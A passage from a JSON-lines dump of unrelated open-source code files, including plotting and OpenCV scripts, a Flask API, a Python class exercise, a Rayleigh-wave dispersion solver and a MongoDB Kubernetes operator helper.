RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image7.jpg', bbox_inches='tight')\nplt.clf()\n\n#Export\n\nrice2=rice2.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice2['Quantity-2011-12'],rice2['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice2=rice2.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice2['Quantity-2012-13'],rice2['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Export scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image8.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#histogram\ncom1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\n\ny=com1['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='y',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image9.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\n\ny=com2['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='b',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Export histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image10.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#table to latex file\ntea1=tea1.reset_index()\t\ntea1.to_latex(writer)\n","repo_name":"avais25/Software-Lab-CS699","sub_path":"lab-9-pyplot-latex/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26864442167","text":"# coding=utf-8\n# import numpy as np\nimport cv2\n\ndef resize_image(image, scale_percent=50):\n rows, cols = image.shape[:2]\n width = int(cols * scale_percent / 100)\n height = int(rows * scale_percent / 100)\n dim = (width, height)\n image = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n return image\n\ndef put_object(img,object, x, y, adjx=15, adjy=15):\n obj_rows, obj_cols = object.shape[:2]\n roi_img = img[(y-adjy):(y-adjy)+obj_rows, (x-adjx):(x-adjx)+obj_cols] \n roi_img [object < [150,150,150]] = object [object < [150,150,150]] \n return img\n \n# ==========================================================================\nface_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('../classificadores/haarcascade_eye.xml')\nmouth_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_mcs_mouth.xml')\n# ==========================================================================\n\nimg = cv2.imread('face.jpg')\nimg = resize_image(img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nmoustache = cv2.imread('moustache_w.png')\nmoustache = resize_image(moustache, 30)\n\n\nglasses = cv2.imread('sungalsses_w.png')\nglasses = resize_image(glasses, 30)\n\nfaces = face_cascade.detectMultiScale(gray)\nfor (x, y, w, h) in faces:\n # cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n\n eyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 10) \n for (ex, ey, ew, eh) in eyes:\n roi_color = put_object(roi_color, glasses, ex, ey, 14, -10)\n break\n # cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n \n\n mouth = mouth_cascade.detectMultiScale(roi_gray, 2.0, 20)\n for (mx, my, mw, mh) in mouth:\n roi_color = put_object(roi_color, moustache, mx, my, 15,15)\n # cv2.rectangle(roi_color, (mx, my), (mx+mw, my+mh), (0, 0, 255), 2)\n # break\n\ncv2.imshow('Turing', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"heloisaGuimaraes/tarefas-processamento-de-imagens-ifma","sub_path":"Aula 13/Filtro Deteccao Face/Exemplo_Faces.py","file_name":"Exemplo_Faces.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35200055455","text":"from __future__ import print_function\nfrom distutils.core import setup, Command\nimport sys\n\n# This is a hack in order to get the package name to be different when\n# building an RPM file. When 'setup.py bdist_rpm' is called, it invokes\n# setup.py twice more, with these command lines:\n# ['setup.py', 'build']\n# ['setup.py', 'install', '-O1', '--root=/home/eric/local/toposort/build/bdist.linux-i686/rpm/BUILDROOT/python-toposort-0.1-1.i386', '--record=INSTALLED_FILES']\n# It's only on the original call (when bdist_rpm is in sys.argv) that\n# I adjust the package name. With Python 2.7, that's enough. I'm not\n# sure about 3.x.\n\nname = 'toposort'\nif 'bdist_rpm' in sys.argv:\n name = 'python{0}-{1}'.format('' if sys.version_info.major == 2 else '3', name)\n\n\n# run our tests\nclass PyTest(Command):\n user_options = []\n def initialize_options(self):\n pass\n def finalize_options(self):\n pass\n def run(self):\n import sys, subprocess\n tests = [('test suite', ['-m', 'test.test_toposort']),\n ]\n if sys.hexversion >= 0x03000000:\n # Skip doctests for python < 3.0. They use set literal reprs, which\n # are different in 2.7. Testing under 3.x is good enough.\n tests.append(('doctests', ['-m' 'doctest', 'README.txt']))\n for name, cmds in tests:\n print(name)\n errno = subprocess.call([sys.executable] + cmds)\n if errno != 0:\n raise SystemExit(errno)\n print('test complete')\n\n\nsetup(name=name,\n version='1.4',\n url='https://bitbucket.org/ericvsmith/toposort',\n author='Eric V. Smith',\n author_email='eric@trueblade.com',\n description='Implements a topological sort algorithm.',\n long_description=open('README.txt').read() + '\\n' + open('CHANGES.txt').read(),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n license='Apache License Version 2.0',\n py_modules=['toposort'],\n\n cmdclass = {'test': PyTest},\n )\n","repo_name":"tdrhq/bark","sub_path":"toposort-1.4/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"694015899","text":"import flask\nfrom flask import request, jsonify\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Test data\nproducts = {'cycling': ['helmet','bike','wheels'],\n 'skiing': ['skis','poles'],\n 'running':['shoes','t-shirt','socks'],\n 'swimming':['bathing suits','swimming cap']}\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '''

    Sports Equipment Shop

    \n

    An API for a test project.

    '''\n\n\n@app.route('/api/v1/resources/products/all', methods=['GET'])\ndef api_all():\n return jsonify(products)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return \"

    404

    The resource could not be found.

    \", 404\n\n@app.route('/api/v1/resources/products/all_categories', methods=['GET'])\ndef api_all_categories():\n results=list(products.keys())\n return jsonify(results)\n\n\n@app.route('/api/v1/resources/products/', methods=['GET', 'POST', 'DELETE'])\ndef api_category(category):\n if request.method==\"GET\":\n if category in products.keys():\n results = products[category]\n return jsonify(results)\n else:\n return page_not_found(404)\n elif request.method==\"POST\":\n products[category]=[]\n elif request.method==\"DELETE\":\n if category not in products.keys():\n return page_not_found(404)\n else:\n del products[category]\n return jsonify(products)\n\n\n@app.route('/api/v1/resources/products//', methods=['POST', 'DELETE'])\ndef api_product(category, product):\n if request.method==\"POST\":\n if category in products.keys():\n category_products=products[category]\n if product in category_products:\n return \"Product already in category.\"\n else:\n category_products.append(product)\n products[category]=category_products\n else:\n new_category={category:[product]}\n products.update(new_category)\n elif request.method==\"DELETE\":\n if category not in products.keys():\n return page_not_found(404)\n category_products=products[category]\n if product not in category_products:\n return page_not_found(404)\n else:\n category_products.remove(product)\n products[category]=category_products\n return jsonify(products)\n\n@app.route('/api/v1/resources/products//', methods=['PUT'])\ndef api_update_category(category,new_category):\n if category not in products.keys():\n return page_not_found(404)\n else:\n products[new_category]=products.pop(category)\n return jsonify(products)\n\n@app.route('/api/v1/resources/products///', methods=['PUT'])\ndef api_update_product(category, product, new_product):\n if category not in products.keys():\n return page_not_found(404)\n category_products=products[category]\n if product not in category_products:\n return page_not_found(404)\n else:\n category_products[category_products.index(product)]=new_product\n products[category]=category_products\n return jsonify(products)\n\napp.run()","repo_name":"peeterliik/product_api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16938837170","text":"from handlers.main_handler import BaseHandler\nimport handlers.main_handler\n\nrecommender = None\n\nclass RankingHandler(BaseHandler):\n\n @staticmethod\n def obfuscate_rate(rate, lower=True, k=5):\n hundred_rate = int(rate * 100)\n if lower:\n return hundred_rate // k * k\n else:\n return (hundred_rate + k - 1) // k * k\n\n def get(self):\n business_config, data_provider = handlers.main_handler.get_context()\n users = data_provider.exesql(\"\"\"\n SELECT id, name from users where ignored == 0 and blocked == 0\n \"\"\")\n\n user_to_gold_answer_correct_rate = {user_id: user.correct_rate_and_count[0] for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_gold_answer_count = {user_id: user.correct_rate_and_count[1] for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_total_answer_count = {user_id: user.answer_count for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_total_answer_count_max = max(user_to_total_answer_count.items(), key=lambda x: x[1])[1]\n user_to_gold_answer_score = []\n for user_id in user_to_gold_answer_count:\n count = user_to_gold_answer_count[user_id]\n correct_rate = user_to_gold_answer_correct_rate[user_id]\n total_count = user_to_total_answer_count[user_id]\n if count >= business_config[\"ranking_min_answers\"]:\n w = business_config[\"correct_rate_weight\"]\n score = 1 / (w * 1 / correct_rate + (1-w) * user_to_total_answer_count_max / total_count) if total_count else 0\n user_to_gold_answer_score.append((user_id, score, correct_rate, count))\n user_to_gold_answer_score.sort(key=lambda x: x[1], reverse=True)\n user_to_name = {id: name for id, name in users}\n\n current_user_id = self.get_current_user_id()\n rank_data = []\n for i, (id, _, rate, count) in enumerate(user_to_gold_answer_score[0: business_config[\"ranking_top_n\"]]):\n is_current_user = current_user_id == id\n rank_data.append((i + 1, user_to_name[id], self.obfuscate_rate(rate), is_current_user, count))\n\n if current_user_id in [a[0] for a in user_to_gold_answer_score]:\n display_current_user_gold_rate = True\n current_user_gold_rate = self.obfuscate_rate(\n user_to_gold_answer_correct_rate[current_user_id])\n try:\n current_user_gold_rate_ranking = next(t[2] for t in user_to_gold_answer_score if t[0] == current_user_id)\n except StopIteration:\n import pdb; pdb.set_trace()\n current_user_gold_rate_percentage = max(self.obfuscate_rate(current_user_gold_rate_ranking / len(user_to_total_answer_count), lower=False),\n 1)\n\n else:\n display_current_user_gold_rate = False\n current_user_gold_rate = None\n current_user_gold_rate_percentage = None\n\n\n feed_dict = {\n 'is_admin': self.check_authority(49999),\n 'data': rank_data,\n 'display_current_user_gold_rate': display_current_user_gold_rate,\n 'current_user_gold_rate': current_user_gold_rate,\n 'current_user_gold_rate_percentage': current_user_gold_rate_percentage,\n }\n\n self.render(\"ranking.html\", **feed_dict)\n","repo_name":"THU-KEG/ECTE","sub_path":"platform/handlers/ranking_handler.py","file_name":"ranking_handler.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3062778828","text":"class Student():\n '''\n Класс Student включает в себя информацию о студентах: имя, фамилия, номер группы и список оценок\n '''\n\n def __init__(self, first_name: str, last_name: str, group: str):\n self.first_name = first_name\n self.last_name = last_name\n self.group = group\n self.marks = []\n\n def add_mark(self):\n '''\n Функция добавляет оценку в список оценок студента, если она больше 0 и меньше 11\n '''\n\n if self.marks == int and 0 < self.marks < 11:\n self.marks.append(marks)\n print('Оценка добавлена')\n else:\n print('Введите верный формат оценки от 1 до 10')\n\n def get_average_mark(self):\n '''\n Функция считает средний балл студента\n '''\n\n if len(self.marks) == 0:\n return 0\n else:\n return sum(self.marks) / len(self.marks)\n\n def get_scolarship(self):\n '''\n Функция возращает размер стипендии студента\n '''\n\n if self.get_average_mark() >= 5:\n return 'Этот студент получает стипендию в размере 500 рублей'\n else:\n return 'Этот студент получает стипендию в размере 150 рублей'\n\n\nclass Aspirant(Student):\n '''\n Класс Aspirant - наследник Student, включает в себя информацию о студентах:\n имя, фамилия, номер группы, список оценок, публикации\n '''\n\n def __init__(self, first_name: str, last_name: str, group: str, scientific_publications: str):\n self.first_name = first_name\n self.last_name = last_name\n self.group = group\n self.marks = []\n self.scientific_publications = scientific_publications\n\n def get_scolarship(self):\n '''\n Функция возращает размер стипендии аспиранта\n '''\n\n if self.get_average_mark() >= 5:\n return 'Этот аспирант получает стипендию в размере 700 рублей'\n else:\n return 'Этот аспирант получает стипендию в размере 250 рублей'\n\np = Student('Иван', 'Пупкин', 'П-41')\np.marks = 5, 1, 6\n\nprint('Имя: ', p.first_name)\nprint('Фамилия: ', p.last_name)\nprint('Группа: ', p.group)\nprint('Оценки: ', p.marks)\nprint (p.get_average_mark())\nprint (p.get_scolarship())\nprint()\n\na = Aspirant ('Мария', 'Шишкина', 'П-51', 'Теория атома')\na.marks = 9, 10, 8\nprint('Имя: ', a.first_name)\nprint('Фамилия: ', a.last_name)\nprint('Группа: ', a.group)\nprint('Оценки: ', a.marks)\nprint('Публикации: ', a.scientific_publications)\nprint (a.get_average_mark())\nprint (a.get_scolarship())\n","repo_name":"AnasnasiaKartashova/OOP","sub_path":"task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70248532330","text":"def Unmanned(L, N, track):\r\n time, odometer, places = 0, 0, getPlaces(track)\r\n while odometer < L:\r\n odometer += 1\r\n time += 1\r\n if odometer in places:\r\n time = w8(time, track[places.index(odometer)])\r\n return time\r\n\r\n\r\ndef getPlaces(track):\r\n places = []\r\n for trLight in track:\r\n places.append(trLight[0])\r\n return places\r\n\r\n\r\ndef w8(time, light):\r\n count = 0\r\n curr = True\r\n while count < time:\r\n if curr:\r\n count += light[1]\r\n curr = False\r\n else:\r\n count += light[2]\r\n curr = True\r\n if curr and (count == time or count > time):\r\n return time\r\n elif not curr and count > time:\r\n return count\r\n elif not curr and count == time:\r\n return time\r\n","repo_name":"LexSteine/Fortune_favors_the_bold","sub_path":"Task14.py","file_name":"Task14.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15167526402","text":"from flask import Flask, render_template, session, escape, request, redirect, url_for\napp = Flask(__name__)\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n\nfrom models import Classs\nfrom views import admin\n\nclasss = Classs(1, 'classname', 'teacher', 'yrleve', 'room', 'schedule', 1)\nadmin(classs.name)\n\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()","repo_name":"raidenphoenix011/EaglewatchPayroll","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38450318232","text":"from i2b2tools.helpers.utils import phi_within_range\n\n# this is mostly to be used as an example predicate\n# it works with a MergeRule to say:\n# 123\n# then merge these 3 tags as one date\n\n# this function specifically determines whether or not the above\n# situation *exists*\ndef _trigram_name_predicate(target, rule):\n \"\"\" Target is a tuple of trigrams, rule is a Rule object, which allows access to the sa. \"\"\"\n token1, token2, token3 = target\n token1 = phi_within_range(rule.sa, token1.start, token1.end)\n token2 = phi_within_range(rule.sa, token2.start, token2.end)\n token3 = phi_within_range(rule.sa, token3.start, token3.end)\n\n if token1 and not token2 and token3:\n if token1.name == token3.name == rule.name:\n return True\n\n return False\n","repo_name":"danlamanna/i2b2tools","sub_path":"i2b2tools/lib/rules/predicates.py","file_name":"predicates.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27787623743","text":"# -*- mode: python -*-\r\na = Analysis(['captura2.py'],\r\n pathex=['Z:\\\\genesis\\\\captura'],\r\n hiddenimports=[],\r\n hookspath=None,\r\n runtime_hooks=None)\r\npyz = PYZ(a.pure)\r\nexe = EXE(pyz,\r\n a.scripts,\r\n a.binaries,\r\n a.zipfiles,\r\n a.datas,\r\n name='captura2.exe',\r\n debug=False,\r\n strip=None,\r\n upx=True,\r\n console=True )\r\n","repo_name":"calimacaco/pyfacil","sub_path":"captura/captura2.spec","file_name":"captura2.spec","file_ext":"spec","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9981763092","text":"# Rayleigh waves from direct integration\n# Ethan Williams - 2023/10/27\n\nimport numpy as np\nfrom copy import deepcopy\nfrom scipy.integrate import odeint\nfrom scipy.optimize import ridder\n\nclass layer:\n def __init__(self,d,vp,vs,rho):\n self.d = np.array(d)\n self.vp = np.array(vp)\n self.vs = np.array(vs)\n self.rho = np.array(rho)\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n return\n \nclass velocity_model:\n '''\n container for velocity model\n water layer is handled with:\n is_water - True or False\n h - water depth (m)\n vw - water acoustic speed (m/s)\n rw - water density (kg/m^3)\n nh - number of points to evaluate in water\n '''\n def __init__(self,d,vp,vs,rho,is_water=False,h=None,vw=None,rw=None,nh=None):\n self.nl = len(d)\n self.layers = np.array([layer(d[i],vp[i],vs[i],rho[i]) for i in range(self.nl)])\n self.nz = self.nl+1\n self.vp = np.array(vp)\n self.vs = np.array(vs)\n self.rho = np.array(rho)\n self.z = np.concatenate(([0],np.cumsum(d)))\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n self.is_water = is_water # True if water\n self.h = h # water layer thickness\n self.vw = vw # water layer sound speed\n self.rw = rw # water layer density\n self.nh = nh # number of points in water layer\n return\n\n def upsample_model(self,dz,zmax):\n '''\n upsample model or extrapolate to greater depth\n '''\n n = [int(np.ceil(l.d/dz)) for l in self.layers]\n zz = np.cumsum([l.d for l in self.layers])\n nz = np.sum(n)\n if nz<=self.nl:\n raise ValueError('Specified nz is less than number of layers...')\n vp_ = np.zeros(nz)\n vs_ = np.zeros(nz)\n ro_ = np.zeros(nz)\n z_ = np.zeros(nz)\n iz = 0\n for i,l in enumerate(self.layers):\n vp_[iz:iz+n[i]] = l.vp\n vs_[iz:iz+n[i]] = l.vs\n ro_[iz:iz+n[i]] = l.rho\n if i == 0:\n z_[iz:iz+n[i]] = np.linspace(0,l.d,n[i]+1)[:-1]\n else:\n z0 = zz[i-1]\n z_[iz:iz+n[i]] = np.linspace(z0,z0+l.d,n[i]+1)[:-1]\n iz += n[i]\n if max(z_) >= zmax:\n idz = (z_<=zmax)\n self.vp = vp_[idz]\n self.vs = vs_[idz]\n self.rho = ro_[idz]\n self.z = z_[idz]\n else:\n nfill = int(np.ceil((zmax-z_[-1])/dz))\n self.vp = np.concatenate((vp_,np.ones(nfill)*vp_[-1]),axis=0)\n self.vs = np.concatenate((vs_,np.ones(nfill)*vs_[-1]),axis=0)\n self.rho = np.concatenate((ro_,np.ones(nfill)*ro_[-1]),axis=0)\n self.z = np.concatenate((z_,np.linspace(z_[-1]+dz,zmax,nfill)),axis=0)\n self.nz = len(self.z)\n self.d = np.diff(self.z)\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n return\n\ndef displacement_stress(y,zi,k,w,m):\n '''\n y - displacement-stress vector for Rayleigh waves\n y[0] = ux; y[1] = uz; y[2] = tx; y[3] = tz\n zi - layer depth to evaluate velocity model\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n returns dy/dz = A@y\n '''\n iz = np.argmin(abs(m.z-zi))\n ro = m.rho[iz]\n la = m.la[iz]\n mu = m.mu[iz]\n s = 4*mu*(la+mu)/(la+2*mu)\n A = np.zeros((4,4))\n A[0,:] = [0, k, 1./mu, 0]\n A[1,:] = [-k*la/(la+2*mu), 0, 0, 1./(la+2*mu)]\n A[2,:] = [s*k**2 - ro*w**2, 0, 0, k*la/(la+2*mu)]\n A[3,:] = [0, -ro*w**2, -k, 0]\n return A @ y\n\ndef integrate(k,w,m):\n '''\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n returns two eigenfunction solutions\n '''\n if k**2 <= w**2/m.vs[-1]**2:\n print('Wavenumber too large for bottom half-space')\n # Vertical wavenumbers\n va = np.sqrt(k**2 - w**2/m.vp[-1]**2)\n vb = np.sqrt(k**2 - w**2/m.vs[-1]**2)\n # Starting solution in bottom half-space\n y0a = np.array([k, va, 2*k*m.mu[-1]*va, m.mu[-1]*(k**2+vb**2)]) * np.exp(va*m.z[-1])\n y0b = np.array([vb, k, m.mu[-1]*(k**2+vb**2), 2*k*vb*m.mu[-1]]) * np.exp(vb*m.z[-1])\n # Integrate to surface\n ya = odeint(displacement_stress,y0a,m.z[::-1],args=((k,w,m)))\n yb = odeint(displacement_stress,y0b,m.z[::-1],args=((k,w,m)))\n return ya[::-1,:], yb[::-1,:]\n\ndef eigenfunction(k,w,m,just_det=False):\n '''\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n just_det - return determinant only, or determinant + eigenfunctions\n '''\n # Integrate from bottom half space to surface of solid Earth\n ya,yb = integrate(k,w,m)\n # If no water layer, return determinant and eigenfunction\n if not m.is_water:\n det = ya[0,2]*yb[0,3] - yb[0,2]*ya[0,3]\n y = ya + (-ya[0,2]/yb[0,2]) * yb\n y /= y[0,1] # normalize\n #det = y[0,3]\n z = m.z\n else: # If water layer, append propagator matrix first\n ew = np.emath.sqrt(w**2/m.vw**2 - k**2)\n dh = np.linspace(0,m.h,m.nh)[::-1]\n yaw = np.zeros((m.nh,4),dtype=np.complex_)\n ybw = np.zeros((m.nh,4),dtype=np.complex_)\n yaw[:,1] = np.cos(ew*dh)*ya[0,1] - (ew/m.rw/w**2)*np.sin(ew*dh)*ya[0,3]\n yaw[:,3] = (w**2*m.rw/ew)*np.sin(ew*dh)*ya[0,1] + np.cos(ew*dh)*ya[0,3]\n yaw[:,0] = (k/m.rw/w**2)*yaw[:,3]\n ybw[:,1] = np.cos(ew*dh)*yb[0,1] - (ew/m.rw/w**2)*np.sin(ew*dh)*yb[0,3]\n ybw[:,3] = (w**2*m.rw/ew)*np.sin(ew*dh)*yb[0,1] + np.cos(ew*dh)*yb[0,3]\n ybw[:,0] = (k/m.rw/w**2)*ybw[:,3]\n det = np.real(ya[0,2]*ybw[0,3] - yb[0,2]*yaw[0,3])\n ys = ya + (-ya[0,2]/yb[0,2]) * yb\n yw = yaw + (-ya[0,2]/yb[0,2]) * ybw\n y = np.concatenate((yw,ys),axis=0)\n y /= ys[0,1] # normalize\n y = np.real(y)\n z = np.concatenate((-1*dh,m.z))\n if just_det:\n return det\n else:\n return det, y, z\n\ndef dispersion(f,m,nb=10,nz=1000,zfac=5,all_modes=False,adaptive_depth=False,return_eig=False,return_model=False):\n '''\n get phase velocity at frequency\n f - single frequency (Hz)\n m - velocity_model object\n nb - number of intervals for root search\n smaller (e.g. 10) = faster, but higher modes may be patchy\n larger (e.g. 100) = slower, but reliable to high frequencies\n nz - number of depth points (if using adaptive_depth)\n zfac - number of wavelengths to truncate model in depth\n all_modes - just return first mode if False\n adaptive_depth - upsample or extend model (important for low-freq stability)\n return_eig - also return eigenfunctions\n return_model - also return adapted velocity model\n '''\n w = 2*np.pi*f\n M = deepcopy(m)\n # bounds for search\n kmin = 1.01*(w/M.vs[-1])\n kmax = w/(0.7*np.min(M.vs))\n # resample/cut/extend velocity model\n if adaptive_depth:\n zmax = zfac*(2*np.pi/kmax)\n M.upsample_model(zmax/nz,zmax)\n # recalculate kmin\n kmin = 1.01*(w/M.vs[-1])\n # get brackets for root search\n kb = np.linspace(kmin,kmax,nb)\n dets = np.zeros(nb)\n for ik,k in enumerate(kb):\n dets[ik] = eigenfunction(k,w,M,just_det=True)\n # get brackets with sign change\n diff = np.diff(np.sign(dets))\n brac = np.argwhere(abs(diff)>1).flatten()\n # find root(s)\n if all_modes:\n ks = []\n for ib in range(len(brac)):\n a = kb[brac[ib]]\n b = kb[brac[ib]+1]\n k = ridder(eigenfunction,a,b,(w,M,True))\n ks.append(k)\n ks = np.array(ks)[::-1]\n cp = w/ks\n elif len(brac)>0:\n a = kb[brac[-1]]\n b = kb[brac[-1]+1]\n k = ridder(eigenfunction,a,b,(w,M,True))\n cp = w/k\n else:\n cp = np.nan\n # return eigenfunctions\n if return_eig:\n dh = M.h/M.nh\n zz = np.concatenate((-1*np.linspace(dh,M.h,M.nh)[::-1],M.z),axis=0)\n if all_modes:\n ys = np.zeros((len(ks),len(zz),4))\n for ik,k in enumerate(ks):\n _,y,z = eigenfunction(k,w,M,just_det=False)\n for j in range(4):\n ys[i,:,j] = np.interp(zz,z,y[:,j])\n else:\n ys = np.zeros((len(zz),4))\n _,y,z = eigenfunction(k,w,M,just_det=False)\n for j in range(4):\n ys[:,j] = np.interp(zz,z,y[:,j])\n if return_model:\n return cp, ys, zz, M\n else:\n return cp, ys, zz\n else:\n if return_model:\n return cp, M\n else:\n return cp\n\n# TO DO:\n# - add energy integral and group velocity functions\n\n","repo_name":"ethanfwilliams/surface_wave_tools","sub_path":"direct_integration.py","file_name":"direct_integration.py","file_ext":"py","file_size_in_byte":8741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41742025502","text":"import logging\nimport json\nfrom base64 import b64decode\n\nfrom kubernetes.client.apis import core_v1_api\nfrom kubernetes.stream import stream\n\nfrom .kubernetes_helpers import read_secret\n\n\nDNS_SUFFIX = 'svc.cluster.local'\n\n\ndef get_member_hostname(member_id, cluster_name, namespace, dns_suffix):\n return '{}-{}.{}.{}.{}'.format(\n cluster_name, member_id, cluster_name, namespace, dns_suffix)\n\n\ndef check_if_replicaset_needs_setup(cluster_object, dns_suffix=DNS_SUFFIX):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n\n pod_name = '{}-0'.format(name)\n exec_cmd = [\n 'mongo',\n 'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', 'rs.status()']\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n # If the replica set is not initialized yet, we initialize it\n if '\"ok\" : 0' in exec_resp and \\\n '\"codeName\" : \"NotYetInitialized\"' in exec_resp:\n initiate_replicaset(cluster_object, dns_suffix=dns_suffix)\n\n # If we can get the replica set status without authenticating as the\n # admin user first, we have to create the users\n if '\"ok\" : 1' in exec_resp:\n create_users(cluster_object)\n\n\ndef initiate_replicaset(cluster_object, dns_suffix=DNS_SUFFIX):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n try:\n replicas = cluster_object['spec']['mongodb']['replicas']\n except KeyError:\n replicas = 3\n\n _rs_config = {\n '_id': name,\n 'version': 1,\n 'members': []\n }\n\n for _id in range(replicas):\n _member_hostname = get_member_hostname(\n _id, name, namespace, dns_suffix)\n _rs_config['members'].append({\n '_id': _id,\n 'host': _member_hostname})\n\n pod_name = '{}-0'.format(name)\n exec_cmd = [\n 'mongo',\n 'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', 'rs.initiate({})'.format(json.dumps(_rs_config))]\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n if '{ \"ok\" : 1 }' in exec_resp:\n logging.info('initialized replicaset {} in ns/{}'.format(\n name, namespace))\n elif '\"ok\" : 0' in exec_resp and \\\n '\"codeName\" : \"NodeNotFound\"' in exec_resp:\n logging.info('waiting for {} {} replicaset members in ns/{}'.format(\n replicas, name, namespace))\n logging.debug(exec_resp)\n else:\n logging.error('error initializing replicaset {} in ns/{}\\n{}'.format(\n name, namespace, exec_resp))\n\n\ndef create_users(cluster_object):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n try:\n replicas = cluster_object['spec']['mongodb']['replicas']\n except KeyError:\n replicas = 3\n\n admin_credentials = read_secret(\n '{}-admin-credentials'.format(name), namespace)\n admin_username = b64decode(\n admin_credentials.data['username']).decode('utf-8')\n admin_password = b64decode(\n admin_credentials.data['password']).decode('utf-8')\n\n monitoring_credentials = read_secret(\n '{}-monitoring-credentials'.format(name), namespace)\n monitoring_username = 